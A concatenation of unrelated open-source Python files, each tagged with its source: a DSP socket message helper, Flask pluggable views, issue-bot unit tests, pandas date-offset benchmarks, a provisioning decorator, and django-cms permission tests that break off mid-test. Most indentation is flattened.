return(bytes_to_list(data))
# Low level bytes management
# Return the message ID and the number of bytes expected in the message
def getMsgAndNbOfBytes(data):
msgID = int(data[0])
length= int.from_bytes(data[1:5],byteorder=sys.byteorder,signed=False)
return(msgID,length)
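# Framing sketch (illustrative): build a header the way the client does,
# one message-ID byte followed by a 4-byte length, and parse it back.
def _demo_header_roundtrip():
    header = (CLIENTREADBUF).to_bytes(1, byteorder=sys.byteorder) \
             + (256).to_bytes(4, byteorder=sys.byteorder)
    msg_id, length = getMsgAndNbOfBytes(header)
    assert (msg_id, length) == (CLIENTREADBUF, 256)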
# A client is requesting data from the server. It is the input of VHT
# Client -> Server
def getBufferMsg(conn,nbBytes):
# Ask buffer from server
a=(CLIENTREADBUF).to_bytes(1,byteorder=sys.byteorder)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Receive buffer from server
data = receiveBytes(conn,nbBytes)
return(data)
# Stop the server when the end of the SDF scheduling has been reached.
# It is to make it easier to end the demo.
# Only the VHT client has to be killed.
# Client -> Server
def stopMsg(conn):
# Send a stop message to server
a=(CLIENTSTOP).to_bytes(1,byteorder=sys.byteorder)
b=(0).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Data is in bytes
# A client is sending some bytes to the server
# It is the output of VHT
# Client -> Server
def writeBufferMsg(conn,theBytes):
# Tell server a buffer is coming
a=(CLIENTWRITEBUF).to_bytes(1,byteorder=sys.byteorder)
nbBytes = len(theBytes)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg = a+b+theBytes
# Send message and buffer to server
sendBytes(conn,msg)
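# End-to-end client sketch (illustrative): request input samples, process
# them, write the result back, then stop the server. The host/port values
# are placeholders and a compatible server is assumed to be listening.
import socket

def _demo_client(host="127.0.0.1", port=5000, nb_samples=128):
    with socket.create_connection((host, port)) as conn:
        raw = getBufferMsg(conn, nb_samples * INTSIZE)  # CLIENTREADBUF request
        samples = bytes_to_list(raw)
        # Toy processing: apply a gain of 2 with Q15 saturation.
        processed = [max(-32768, min(32767, 2 * s)) for s in samples]
        writeBufferMsg(conn, list_to_bytes(processed))  # CLIENTWRITEBUF message
        stopMsg(conn)                                   # CLIENTSTOP message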
# Source: ARM-software/CMSIS_5 | CMSIS/DSP/cmsisdsp/sdf/nodes/host/message.py | Python | Apache-2.0 license | 3,886 bytes
# -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
'delete', 'put', 'trace', 'patch'])
class View(object):
"""Alternative way to use view functions. A subclass has to implement
:meth:`dispatch_request` which is called with the view arguments from
the URL routing system. If :attr:`methods` is provided the methods
do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
method explicitly::
class MyView(View):
methods = ['GET']
def dispatch_request(self, name):
return 'Hello %s!' % name
app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))
When you want to decorate a pluggable view you will have to either do that
when the view function is created (by wrapping the return value of
:meth:`as_view`) or you can use the :attr:`decorators` attribute::
class SecretView(View):
methods = ['GET']
decorators = [superuser_required]
def dispatch_request(self):
...
The decorators stored in the decorators list are applied one after another
when the view function is created. Note that you can *not* use the class
based decorators since those would decorate the view class and not the
generated view function!
"""
    #: A list of methods this pluggable view can handle.
methods = None
    #: The canonical way to decorate class-based views is to decorate the
    #: return value of as_view(). However, since that moves parts of the
    #: logic from the class declaration to the place where it's hooked
    #: into the routing system, this attribute offers an alternative.
#:
#: You can place one or more decorators in this list and whenever the
#: view function is created the result is automatically decorated.
#:
#: .. versionadded:: 0.8
decorators = []
def dispatch_request(self):
"""Subclasses have to override this method to implement the
actual view function code. This method is called with all
the arguments from the URL rule.
"""
raise NotImplementedError()
@classmethod
def as_view(cls, name, *class_args, **class_kwargs):
"""Converts the class into an actual view function that can be used
with the routing system. Internally this generates a function on the
fly which will instantiate the :class:`View` on each request and call
the :meth:`dispatch_request` method on it.
The arguments passed to :meth:`as_view` are forwarded to the
constructor of the class.
"""
def view(*args, **kwargs):
self = view.view_class(*class_args, **class_kwargs)
return self.dispatch_request(*args, **kwargs)
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# we attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods
return view
class MethodViewType(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if 'methods' not in d:
methods = set(rv.methods or [])
for key, value in d.iteritems():
if key in http_method_funcs:
methods.add(key.upper())
# if we have no method at all in there we don't want to
# add a method list. (This is for instance the case for
# the baseclass or another subclass of a base method view
# that does not introduce new methods).
if methods:
rv.methods = sorted(methods)
return rv
class MethodView(View):
"""Like a regular class-based view but that dispatches requests to
particular methods. For instance if you implement a method called
    :meth:`get` it means it will respond to ``'GET'`` requests and
the :meth:`dispatch_request` implementation will automatically
forward your request to that. Also :attr:`options` is set for you
automatically::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
__metaclass__ = MethodViewType
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# if the request method is HEAD and we don't have a handler for it
# retry with GET
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
assert meth is not None, 'Unimplemented method %r' % request.method
return meth(*args, **kwargs)
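# A minimal sketch of registering one of these pluggable views (route and
# class names here are illustrative; the import is done lazily to avoid a
# circular import of the flask package from within flask.views itself).
def _demo_method_view():
    from flask import Flask

    class EchoAPI(MethodView):
        def get(self):
            return 'hello'

    app = Flask(__name__)
    app.add_url_rule('/echo', view_func=EchoAPI.as_view('echo'))
    assert app.test_client().get('/echo').data == 'hello'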
# Source: darren-rogan/CouchPotatoServer | libs/flask/views.py | Python | GPL-3.0 license | 5,629 bytes
# python -m unittest discover
import unittest
from datetime import datetime
from tasks import old_issues as c
class TestCloseOldIssue(unittest.TestCase):
def test_is_closed_issue(self):
self.assertEquals(c.is_closed({'closed_at': None}), False)
self.assertEquals(c.is_closed({'closed_at': "2014-10-10T00:09:51Z"}), True)
def test_is_pull_request(self):
self.assertEquals(c.is_pull_request({}), False)
self.assertEquals(c.is_pull_request({'pull_request': {}}), True)
def test_has_milestone(self):
self.assertEquals(c.has_milestone({'milestone': None}), False)
self.assertEquals(c.has_milestone({'milestone': "v1.1"}), True)
def test_is_old_issue(self):
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 9), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 11), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 12), close_inactive_after=10), True)
def test_has_labels_preventing_close(self):
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'bug'
}]
}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({ 'labels': [] }, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'ready'
}]
}, ['in progress', 'ready', 'high priority']), True)
def test_has_comments_preventing_close(self):
self.assertEquals(c.has_comments_preventing_close({
'comments': None
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 0
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 2
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 3
}, 2), True)
def test_has_assignee_preventing_close(self):
self.assertEquals(c.has_assignee_preventing_close({
'assignee': None
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': {}
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': { 'login': 'steve' }
}), True)
def test_has_milestone_preventing_close(self):
self.assertEquals(c.has_milestone_preventing_close({}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': None
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': {}
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': { 'url': 'https://api.github.com/repos/octocat/Hello-World/milestones/1' }
}), True)
def test_has_events_preventing_close(self):
self.assertEquals(c.has_events_preventing_close(None), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'labeled' }
]), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'referenced' }
]), True)
# Source: driftyco/ionitron-issues | tests/test_close_old_issue.py | Python | MIT license | 3,578 bytes
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
import pandas as pd
try:
import pandas.tseries.holiday # noqa
except ImportError:
pass
hcal = pd.tseries.holiday.USFederalHolidayCalendar()
# These offsets currently raise a NotImplementedError with .apply_index()
non_apply = [pd.offsets.Day(),
pd.offsets.BYearEnd(),
pd.offsets.BYearBegin(),
pd.offsets.BQuarterEnd(),
pd.offsets.BQuarterBegin(),
pd.offsets.BMonthEnd(),
pd.offsets.BMonthBegin(),
pd.offsets.CustomBusinessDay(),
pd.offsets.CustomBusinessDay(calendar=hcal),
pd.offsets.CustomBusinessMonthBegin(calendar=hcal),
             pd.offsets.CustomBusinessMonthEnd(calendar=hcal)]
other_offsets = [pd.offsets.YearEnd(), pd.offsets.YearBegin(),
pd.offsets.QuarterEnd(), pd.offsets.QuarterBegin(),
pd.offsets.MonthEnd(), pd.offsets.MonthBegin(),
pd.offsets.DateOffset(months=2, days=2),
pd.offsets.BusinessDay(), pd.offsets.SemiMonthEnd(),
pd.offsets.SemiMonthBegin()]
offsets = non_apply + other_offsets
class ApplyIndex(object):
goal_time = 0.2
params = other_offsets
param_names = ['offset']
def setup(self, offset):
N = 10000
self.rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_apply_index(self, offset):
offset.apply_index(self.rng)
class OnOffset(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.dates = [datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)]
def time_on_offset(self, offset):
for date in self.dates:
offset.onOffset(date)
class OffsetSeriesArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
self.data = pd.Series(rng)
def time_add_offset(self, offset):
self.data + offset
class OffsetDatetimeIndexArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
self.data = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_add_offset(self, offset):
self.data + offset
class OffsetDatetimeArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.date = datetime(2011, 1, 1)
self.dt64 = np.datetime64('2011-01-01 09:00Z')
def time_apply(self, offset):
offset.apply(self.date)
def time_apply_np_dt64(self, offset):
offset.apply(self.dt64)
def time_add(self, offset):
self.date + offset
def time_add_10(self, offset):
self.date + (10 * offset)
def time_subtract(self, offset):
self.date - offset
def time_subtract_10(self, offset):
self.date - (10 * offset)
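# A standalone illustration of the operation these benchmarks time (mirrors
# OffsetDatetimeIndexArithmetic.time_add_offset; purely a sketch):
def _demo_offset_add():
    rng = pd.date_range(start='1/1/2000', periods=5, freq='T')
    # Each timestamp rolls forward to the next business day.
    print(rng + pd.offsets.BusinessDay())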
# Source: zfrenchee/pandas | asv_bench/benchmarks/offset.py | Python | BSD-3-Clause license | 3,276 bytes
import logging
from spacel.provision.app.base_decorator import BaseTemplateDecorator
logger = logging.getLogger('spacel.provision.app.db')
class BaseDbTemplateDecorator(BaseTemplateDecorator):
def __init__(self, ingress):
super(BaseDbTemplateDecorator, self).__init__()
self._ingress = ingress
def _add_client_resources(self, resources, app_region, port, params,
sg_ref):
clients = params.get('clients', ())
ingress_resources = self._ingress.ingress_resources(app_region,
port,
clients,
sg_ref=sg_ref)
logger.debug('Adding %s ingress rules.', len(ingress_resources))
resources.update(ingress_resources)
# Source: pebble/spacel-provision | src/spacel/provision/app/db/base.py | Python | MIT license | 874 bytes
# -*- coding: utf-8 -*-
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
from django.contrib.admin.utils import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.translation import override as force_language
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_nodes
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from cms.utils.page_permissions import user_can_publish_page, user_can_view_page
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
    Fixtures contain 3 users, 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_staff, 'publish_page')
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_master, 'publish_page')
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'body': 'Test'
}
endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin')
response = self.client.post(endpoint, post_data)
self.assertEqual(response.status_code, 302)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(user_can_publish_page(self.user_slave, page))
# publish as slave, published as user_master before
publish_page(page, self.user_slave, 'en')
# user_slave is moderator for this page
# approve / publish as user_slave
# user master should be able to approve as well
@override_settings(
CMS_PLACEHOLDER_CONF={
'col_left': {
'default_plugins': [
{
'plugin_type': 'TextPlugin',
'values': {
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit. Culpa, repellendus, delectus, quo quasi ullam inventore quod quam aut voluptatum aliquam voluptatibus harum officiis officia nihil minus unde accusamus dolorem repudiandae.'
},
},
]
},
},
)
def test_default_plugins(self):
with self.login_user_context(self.user_slave):
self.assertEqual(CMSPlugin.objects.count(), 0)
response = self.client.get(self.slave_page.get_absolute_url(), {'edit': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(CMSPlugin.objects.count(), 1)
def test_page_added_by_slave_can_be_published_by_user_master(self):
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# same as test_slave_can_add_page_under_slave_home
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertTrue(user_can_publish_page(self.user_master, page))
        # user_master should have publish permissions for children as well
publish_page(self.slave_page, self.user_master, 'en')
page = publish_page(page, self.user_master, 'en')
self.assertTrue(page.publisher_public_id)
# user_master is moderator for top level page / but can't approve descendants?
# approve / publish as user_master
# user master should be able to approve descendants
def test_super_can_add_plugin(self):
self._add_plugin(self.user_super, page=self.slave_page)
def test_master_can_add_plugin(self):
self._add_plugin(self.user_master, page=self.slave_page)
def test_slave_can_add_plugin(self):
self._add_plugin(self.user_slave, page=self.slave_page)
def test_subtree_needs_approval(self):
# create page under slave_page
page = create_page("parent", "nav_playground.html", "en",
parent=self.home_page)
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en", parent=page, published=False)
# publish both of them in reverse order
subpage = publish_page(subpage, self.user_master, 'en')
# subpage should not be published, because parent is not published
self.assertNeverPublished(subpage)
        # publish page (parent of subpage)
page = publish_page(page, self.user_master, 'en')
self.assertPublished(page)
self.assertNeverPublished(subpage)
subpage = publish_page(subpage, self.user_master, 'en')
self.assertPublished(subpage)
def test_subtree_with_super(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en",
parent=page)
self.assertFalse(subpage.publisher_public)
# tree id must be the same
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
# publish both of them
page = self.reload(page)
page = publish_page(page, self.user_super, 'en')
        # reload subpage, as there was a path change
subpage = self.reload(subpage)
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
subpage = publish_page(subpage, self.user_super, 'en')
# tree id must stay the same
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
def test_super_add_page_to_root(self):
"""Create page which is not under moderation in root, and check if
some properties are correct.
"""
# create page under root
page = create_page("page", "nav_playground.html", "en")
# public must not exist
self.assertFalse(page.publisher_public)
def test_plugins_get_published(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
placeholder = page.placeholders.all()[0]
add_plugin(placeholder, "TextPlugin", "en", body="test")
# public must not exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
publish_page(page, self.user_super, 'en')
self.assertEqual(CMSPlugin.objects.all().count(), 2)
def test_remove_plugin_page_under_moderation(self):
# login as slave and create page
page = create_page("page", "nav_playground.html", "en", parent=self.slave_page)
# add plugin
placeholder = page.placeholders.all()[0]
plugin = add_plugin(placeholder, "TextPlugin", "en", body="test")
# publish page
page = self.reload(page)
page = publish_page(page, self.user_slave, 'en')
# only the draft plugin should exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
# master approves and publishes the page
# first approve slave-home
slave_page = self.reload(self.slave_page)
publish_page(slave_page, self.user_master, 'en')
page = self.reload(page)
page = publish_page(page, self.user_master, 'en')
# draft and public plugins should now exist
self.assertEqual(CMSPlugin.objects.all().count(), 2)
# login as slave and delete the plugin - should require moderation
with self.login_user_context(self.user_slave):
plugin_data = {
'plugin_id': plugin.pk
}
endpoint = self.get_delete_plugin_uri(plugin)
response = self.client.post(endpoint, plugin_data)
self.assertEqual(response.status_code, 302)
# there should only be a public plugin - since the draft has been deleted
self.assertEqual(CMSPlugin.objects.all().count(), 1)
page = self.reload(page)
# login as super user and approve/publish the page
publish_page(page, self.user_super, 'en')
# there should now be 0 plugins
self.assertEqual(CMSPlugin.objects.all().count(), 0)
def test_superuser_can_view(self):
url = self.page_b.get_absolute_url(language='en')
with self.login_user_context(self.user_super):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_staff_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
        # verify that user_staff has no explicit view permission on this page
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_staff:
has_perm = True
self.assertEqual(has_perm, False)
login_ok = self.client.login(username=getattr(self.user_staff, get_user_model().USERNAME_FIELD),
password=getattr(self.user_staff, get_user_model().USERNAME_FIELD))
self.assertTrue(login_ok)
# really logged in
self.assertTrue('_auth_user_id' in self.client.session)
login_user_id = self.client.session.get('_auth_user_id')
user = get_user_model().objects.get(pk=self.user_staff.pk)
self.assertEqual(str(login_user_id), str(user.id))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_normal_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
        # verify that user_normal has access to this page
normal_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_normal:
normal_has_perm = True
self.assertTrue(normal_has_perm)
with self.login_user_context(self.user_normal):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
        # verify that user_non_global has no access to this page
non_global_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_non_global:
non_global_has_perm = True
self.assertFalse(non_global_has_perm)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# non logged in user
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_globalpermission(self):
# Global user
user_global = self._create_user("global")
with self.login_user_context(self.user_super):
user_global = create_page_user(user_global, user_global)
user_global.is_staff = False
user_global.save() # Prevent is_staff permission
global_page = create_page("global", "nav_playground.html", "en",
published=True)
# Removed call since global page user doesn't have publish permission
#global_page = publish_page(global_page, user_global)
# it's allowed for the normal user to view the page
assign_user_to_page(global_page, user_global,
global_permission=True, can_view=True)
url = global_page.get_absolute_url('en')
all_view_perms = PagePermission.objects.filter(can_view=True)
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == user_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=user_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, True)
# user_global
with self.login_user_context(user_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# self.non_user_global
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == self.user_non_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=self.user_non_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, False)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_all(self):
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR='all'):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_none(self):
# default of when to show pages to anonymous user doesn't take
# global permissions into account
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR=None):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(CMS_PERMISSION=True)
class PatricksMoveTest(CMSTestCase):
"""
    Fixtures contain 3 users, 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
            - created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish/moderate this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
def setUp(self):
# create super user
self.user_super = self._create_user("super", True, True)
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create master user
self.user_master = self._create_user("master", True)
self.add_permission(self.user_master, 'change_page')
self.add_permission(self.user_master, 'publish_page')
#self.user_master = create_page_user(self.user_super, master, grant_all=True)
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "nav_playground.html", "en",
parent=self.master_page, created_by=self.user_super)
slave = self._create_user("slave", True)
self.user_slave = create_page_user(self.user_super, slave, can_add_page=True,
can_change_page=True, can_delete_page=True)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
with self.login_user_context(self.user_slave):
# 000200010001
self.pa = create_page("pa", "nav_playground.html", "en", parent=self.slave_page)
# 000200010002
self.pb = create_page("pb", "nav_playground.html", "en", parent=self.pa, position="right")
# 000200010003
self.pc = create_page("pc", "nav_playground.html", "en", parent=self.pb, position="right")
self.pd = create_page("pd", "nav_playground.html", "en", parent=self.pb)
self.pe = create_page("pe", "nav_playground.html", "en", parent=self.pd, position="right")
self.pf = create_page("pf", "nav_playground.html", "en", parent=self.pe)
self.pg = create_page("pg", "nav_playground.html", "en", parent=self.pf, position="right")
self.ph = create_page("ph", "nav_playground.html", "en", parent=self.pf, position="right")
self.assertFalse(self.pg.publisher_public)
# login as master for approval
self.slave_page = self.slave_page.reload()
publish_page(self.slave_page, self.user_master, 'en')
# publish and approve them all
publish_page(self.pa, self.user_master, 'en')
publish_page(self.pb, self.user_master, 'en')
publish_page(self.pc, self.user_master, 'en')
publish_page(self.pd, self.user_master, 'en')
publish_page(self.pe, self.user_master, 'en')
publish_page(self.pf, self.user_master, 'en')
publish_page(self.pg, self.user_master, 'en')
publish_page(self.ph, self.user_master, 'en')
self.reload_pages()
def reload_pages(self):
self.pa = self.pa.reload()
self.pb = self.pb.reload()
self.pc = self.pc.reload()
self.pd = self.pd.reload()
self.pe = self.pe.reload()
self.pf = self.pf.reload()
self.pg = self.pg.reload()
self.ph = self.ph.reload()
def test_patricks_move(self):
"""
Tests permmod when moving trees of pages.
1. build following tree (master node is approved and published)
slave-home
/ | \
A B C
/ \
D E
/ | \
F G H
2. perform move operations:
1. move G under C
2. move E under G
slave-home
/ | \
A B C
/ \
D G
\
E
/ \
F H
        3. approve nodes in the following order:
1. approve H
2. approve G
3. approve E
4. approve F
"""
self.assertEqual(self.pg.node.parent, self.pe.node)
# perform moves under slave...
self.move_page(self.pg, self.pc)
self.reload_pages()
# page is now under PC
self.assertEqual(self.pg.node.parent, self.pc.node)
self.assertEqual(self.pg.get_absolute_url(), self.pg.publisher_public.get_absolute_url())
self.move_page(self.pe, self.pg)
self.reload_pages()
self.assertEqual(self.pe.node.parent, self.pg.node)
self.ph = self.ph.reload()
        # check urls - they should stay the same after the move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
self.pg.get_absolute_url()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
self.ph.get_absolute_url()
)
# check if urls are correct after move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/' % self.get_pages_root()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
